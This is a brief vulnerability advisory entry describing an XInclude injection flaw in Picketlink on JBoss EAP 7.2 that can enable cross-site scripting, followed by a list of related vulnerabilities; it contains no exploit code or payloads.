Description
It was found that Picketlink as shipped with Jboss Enterprise Application Platform 7.2 would accept an xinclude parameter in SAMLresponse XML. An attacker could use this flaw to send a URL to achieve cross-site scripting or possibly conduct further attacks.
Remediation
References
Related Vulnerabilities
Moodle Uncontrolled Resource Consumption Vulnerability (CVE-2021-20185)
MediaWiki Incorrect Permission Assignment for Critical Resource Vulnerability (CVE-2021-30156)
SharePoint Integer Overflow or Wraparound Vulnerability (CVE-2008-4019)
WordPress Plugin Breezing Forms SQL Injection (1.2.7.30)
WordPress Plugin Pluginception Multiple Cross-Site Scripting Vulnerabilities (1.2)